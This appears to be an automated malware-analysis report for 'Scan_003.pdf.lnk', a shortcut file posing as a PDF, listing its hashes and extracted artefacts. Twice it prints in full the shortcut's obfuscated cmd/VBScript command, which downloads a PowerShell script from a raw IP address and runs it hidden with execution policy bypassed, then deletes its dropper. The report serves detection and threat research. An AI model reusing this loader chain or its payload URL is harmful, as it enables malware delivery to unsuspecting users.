Infection Chain
Summary by MalvaGPT
Characteristics
Hashes

MD5:    64bc29705fa0b0c0f2e6cb9295c6f623
SHA1:   e7db2117f21116fb3c7526739e5bfd26623c6542
SHA256: 250d41a4f0654fb73935b6aff3ea975ec8cbdeb9c1bc127858ec3ec5f6390290
SHA384: 559337bf282708d3a72aa5882f8c3befcd54d50f72d706e2f366555f0d29df85286834ce8596da3610ac6d72dc98a00b
SHA512: eb988b28007fabcac03b6533dc035c6d1381f79ae1d9b1cadfa6712310a1d714dfb445a3251b2eda8b3211ca18051560af27ab360a0c14260c61699f049b2cc6
SSDeep: 24:8d/Cf3DwdfCXGiXnSpVT6XtBxb1En96pMERrBCU:8lCPkdfYXnSpEtb1U6p9r
TLSH:   D1726A8121E80308F2B6FF399A7BAB41093BF990ED71CB6C8E508C5D2954942ED75F66
Artefacts

Name:  LNK: Command Execution
Value: cmd.exe /v /c "set "a=&" && set "v1=MSXM" && set "v2=L2.XML" && set "o1=ADOD" && set "o2=B.S" && echo Set h=CreateObject("!v1!" ^!a! "!v2!HTTP"):h.open "GET","http://193.169.194.40/S7yhd67/buggypassage.ps1",False:h.setRequestHeader "User-Agent","UA WindowsPowerShell":h.send:Set b=CreateObject("!o1!" ^!a! "!o2!tream"):b.Type=1:b.Open:b.Write h.responseBody:b.SaveToFile "%TEMP%\pzsR.ps1",2 > %TEMP%\gtP.vbs && cscript //b %TEMP%\gtP.vbs && powershell -NoP -W Hidden -ExecutionPolicy Bypass -File %TEMP%\pzsR.ps1 & del %TEMP%\gtP.vbs"

Name:  URLs in VB Code - #1
Value: http://193.169.194.40/S7yhd67/buggypassage.ps1

Name:  Deobfuscated PowerShell
Value: & Remove-Item "%TEMP%\gtP.vbs"

Name:  Deobfuscated PowerShell
Value: & Remove-Item "%TEMP%\gtP.vbs IconLocation: imageres.dll"
Scan_003.pdf.lnk (16.57 KB)
No malware configuration was found at this point.
Artefacts

Name:     LNK: Command Execution
Value:    cmd.exe /v /c "set "a=&" && set "v1=MSXM" && set "v2=L2.XML" && set "o1=ADOD" && set "o2=B.S" && echo Set h=CreateObject("!v1!" ^!a! "!v2!HTTP"):h.open "GET","http://193.169.194.40/S7yhd67/buggypassage.ps1",False:h.setRequestHeader "User-Agent","UA WindowsPowerShell":h.send:Set b=CreateObject("!o1!" ^!a! "!o2!tream"):b.Type=1:b.Open:b.Write h.responseBody:b.SaveToFile "%TEMP%\pzsR.ps1",2 > %TEMP%\gtP.vbs && cscript //b %TEMP%\gtP.vbs && powershell -NoP -W Hidden -ExecutionPolicy Bypass -File %TEMP%\pzsR.ps1 & del %TEMP%\gtP.vbs"
Verdict:  Malicious
Location: Scan_003.pdf.lnk

Name:     URLs in VB Code - #1
Value:    http://193.169.194.40/S7yhd67/buggypassage.ps1
Location: Scan_003.pdf.lnk > [Lnk Summary]

Name:     Deobfuscated PowerShell
Value:    & Remove-Item "%TEMP%\gtP.vbs"
Verdict:  Malicious
Location: Scan_003.pdf.lnk > LNK CommandLine > [PowerShell Command]

Name:     Deobfuscated PowerShell
Value:    & Remove-Item "%TEMP%\gtP.vbs IconLocation: imageres.dll"
Verdict:  Malicious
Location: Scan_003.pdf.lnk > [Lnk Summary] > [PowerShell Command]
